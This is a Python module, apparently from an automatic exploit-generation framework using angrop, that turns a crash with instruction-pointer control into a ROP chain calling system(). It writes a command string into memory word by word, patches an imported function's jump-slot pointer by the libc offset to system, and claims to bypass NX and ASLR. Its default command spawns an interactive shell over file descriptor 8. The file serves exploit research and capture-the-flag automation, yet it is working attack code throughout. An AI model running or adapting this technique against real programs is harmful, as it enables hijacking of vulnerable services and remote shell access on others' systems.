import logging
import struct

from angrop.errors import RopException

from ...vulnerability import Vulnerability
from .. import Exploit, CannotExploit
from ..technique import Technique

# Module-level logger; referred to by the short name ``l`` in this module.
l = logging.getLogger(name=__name__)


class RopToSystemComplicated(Technique):
    """Reach ``system(cmd)`` by redirecting an imported function's pointer.

    The generated ROP chain does three things:

    1. Adds the command string, one 32-bit little-endian word at a time, into a
       memory region that is assumed to be all zeros (``rop.add_to_mem`` adds to
       the existing contents, so a zeroed region ends up holding the string).
    2. Adds ``system - func`` (their distance inside the loaded libc) to the
       function pointer at ``func``'s jump-slot relocation address, so that
       pointer now refers to ``system``.
    3. Calls ``func`` through its PLT stub with the string address as the only
       argument.

    Because the string is packed with ``"<I"``, this technique as written targets
    32-bit little-endian binaries.
    """

    name = "rop_to_system_complicated"
    applicable_to = ['unix']

    # FIXME: address of an all-zero region in .data of one specific binary.
    # Callers can override it with ``apply(str_addr=...)``.
    _DEFAULT_STR_ADDR = 0x8053e9e

    # Size in bytes of each word written by add_to_mem (matches the "<I" format).
    _WORD_SIZE = 4

    def check(self):
        """Return True if this technique can be applied to ``self.crash``.

        Requires a ROP chain builder, control over IP, a loaded libc in which
        ``system`` resolves, and a non-empty PLT in the main binary. On failure
        the reason is recorded with ``check_fail_reason``.
        """
        if self.rop is None:
            self.check_fail_reason("No ROP available.")
            return False

        # can only exploit ip overwrites
        if not self.crash.one_of([Vulnerability.IP_OVERWRITE, Vulnerability.PARTIAL_IP_OVERWRITE]):
            self.check_fail_reason("Cannot control IP.")
            return False

        # libc has to be loaded
        libc_obj = self._get_libc_obj()
        if libc_obj is None:
            self.check_fail_reason("libc.so is not found in the process space.")
            return False

        # it has to have "system"
        system_addr = self._get_libc_func_addr("system")
        if system_addr is None:
            self.check_fail_reason("Cannot find system() in libc.so.")
            return False

        # has to have plt
        plt = self.crash.project.loader.main_object.plt
        if not plt:
            self.check_fail_reason("PLT does not exist.")
            return False

        return True

    @staticmethod
    def chop_string(s, n):
        """Split ``s`` (str or bytes) into consecutive slices of length ``n``.

        The last slice is shorter than ``n`` when ``len(s)`` is not a multiple of ``n``.
        """

        chopped = [ ]
        for i in range(0, len(s), n):
            chopped.append(s[i : i + n])
        return chopped

    def apply(self, to_exec=None, str_addr=None, **kwargs): #pylint:disable=arguments-differ
        """Build an exploit that runs ``system(to_exec)``.

        :param to_exec:  Shell command handed to ``system()``. Defaults to a
                         hard-coded interactive shell redirected to fd 8.
        :param str_addr: Address of a writable region assumed to be all zeros,
                         where the command string is built. Defaults to
                         ``_DEFAULT_STR_ADDR``.
        :returns:        An :class:`Exploit` marked as bypassing NX and ASLR.
        :raises CannotExploit: if libc/system is missing, no usable PLT function
                               exists, a chain piece cannot be built, the chain
                               cannot be inserted, or the result is unsatisfiable.
        """

        if to_exec is None:
            # FIXME: Hardcoded exec string for now
            to_exec = "/bin/sh -i >&{fd} 0>&{fd} 2>&{fd}".format(fd=8)
        if str_addr is None:
            str_addr = self._DEFAULT_STR_ADDR

        # Use explicit checks instead of assert: apply() may run without check(),
        # and asserts are stripped under -O.
        libc_obj = self._get_libc_obj()
        if libc_obj is None:
            raise CannotExploit("[%s] libc.so is not found in the process space." % self.name)
        l.warning("Using libc from %s. This exploit will fail if this libc is not the one used remotely.",
                  libc_obj.binary)

        system_addr = self._get_libc_func_addr("system")
        if system_addr is None:
            raise CannotExploit("[%s] cannot find system() in libc.so." % self.name)

        # Step 1: build the command string in the (assumed all-zero) region.
        chunk_list = self._add_string_to_mem(to_exec, str_addr)

        # Step 2: increment a function pointer so that it points to "system".
        # FIXME:
        func_name, func_addr, func_addr_ptr, func_libc_addr = self._pick_plt_function()
        diff = system_addr - func_libc_addr
        l.debug("The difference between libc function system and libc function %s is %#x.", func_name, diff)

        try:
            chunk_list.append(self.rop.add_to_mem(func_addr_ptr, diff))
            # Step 3: call func_ptr(str_addr), which now lands in system(str_addr).
            chunk_list.append(self.rop.func_call(func_addr, [str_addr]))
        except RopException as ex:
            raise CannotExploit("[%s] unable to build the system() call chain" % self.name) from ex

        # Make sure there are no null bytes!
        for chunk in chunk_list:
            self._forbid_null_bytes(chunk)

        chain = sum(chunk_list[1:], chunk_list[0])

        # insert the chain into the binary
        try:
            chain, chain_addr = self._ip_overwrite_with_chain(chain, self.crash.state)
        except CannotExploit as ex:
            raise CannotExploit("[%s] unable to insert chain" % self.name) from ex

        # add the constraint to the state that the chain must exist at the address
        chain_mem = self.crash.state.memory.load(chain_addr, chain.payload_len)
        self.crash.state.add_constraints(chain_mem == self.crash.state.solver.BVV(chain.payload_str()))

        if not self.crash.state.satisfiable():
            raise CannotExploit("[%s] generated exploit is not satisfiable" % self.name)

        return Exploit(self.crash, bypasses_nx=True, bypasses_aslr=True)

    def _add_string_to_mem(self, to_exec, str_addr):
        """Return ROP chunks that add ``to_exec`` word-by-word starting at ``str_addr``.

        The string is ASCII-encoded (non-ASCII raises ``UnicodeEncodeError``). If
        its length is not a multiple of the word size, it is padded with spaces.
        A short last chunk cannot be unpacked as a full 32-bit word, and a NUL pad
        would put zero bytes into the written value. Trailing spaces are harmless
        for a shell command. The terminating NUL is expected to come from the
        zeroed region.

        :raises CannotExploit: if angrop cannot build a chunk for some word.
        """
        size = self._WORD_SIZE
        data = to_exec.encode("ascii")
        data += b" " * (-len(data) % size)

        chunks = [ ]
        for index, word in enumerate(self.chop_string(data, size)):
            offset = index * size
            value = struct.unpack("<I", word)[0]
            try:
                chunk = self.rop.add_to_mem(str_addr + offset, value)
            except RopException as ex:
                # Report byte offsets into the string, not the chunk index.
                raise CannotExploit("Can't find a way to write chunk [{}:{}] of the string '{}' to memory!".format(
                    offset, offset + size, to_exec)) from ex
            chunks.append(chunk)
        return chunks

    def _pick_plt_function(self):
        """Choose an imported function whose pointer will be redirected to ``system``.

        Tries ``open`` first, then every PLT entry in order. Skips names that start
        with ``__``, names missing from either ``plt`` or ``jmprel``, and names with
        no address in the loaded libc, since that address is needed to compute the
        offset to ``system``.

        NOTE(review): adding the libc offset only yields ``system`` if the pointer
        already holds the resolved libc address (e.g. the function has been
        called before, or binding is eager). This is presumably why ``open`` is
        preferred. Confirm against the target.

        :returns: ``(func_name, plt_stub_addr, func_ptr_addr, func_libc_addr)``
        :raises CannotExploit: if no candidate qualifies.
        """
        main_obj = self.crash.project.loader.main_object
        plt = main_obj.plt
        jmprel = main_obj.jmprel

        for func_name in ["open"] + list(plt.keys()):
            if func_name.startswith("__"):
                continue
            # "open" is tried even if absent from the PLT, so check both tables
            # before indexing either of them.
            if func_name not in plt or func_name not in jmprel:
                continue
            func_libc_addr = self._get_libc_func_addr(func_name)
            if func_libc_addr is None:
                continue
            l.debug("Picking PLT function %s.", func_name)
            return func_name, plt[func_name], jmprel[func_name].rebased_addr, func_libc_addr

        raise CannotExploit("All functions in PLT do not exist in libc.")

    @staticmethod
    def _forbid_null_bytes(chunk):
        """Constrain every byte of the chunk's symbolic values to be non-zero.

        Concrete ``int`` values in the chunk are not constrained.
        """
        constraints = [ ]
        for value, _ in chunk._values: # pylint:disable=protected-access
            if isinstance(value, int):
                continue
            # chop(8) yields one piece per byte. Chopping by the word size would
            # only rule out all-zero words, not individual NUL bytes.
            for byte in value.chop(8):
                constraints.append(byte != 0)

        for constraint in constraints:
            chunk.add_constraint(constraint)
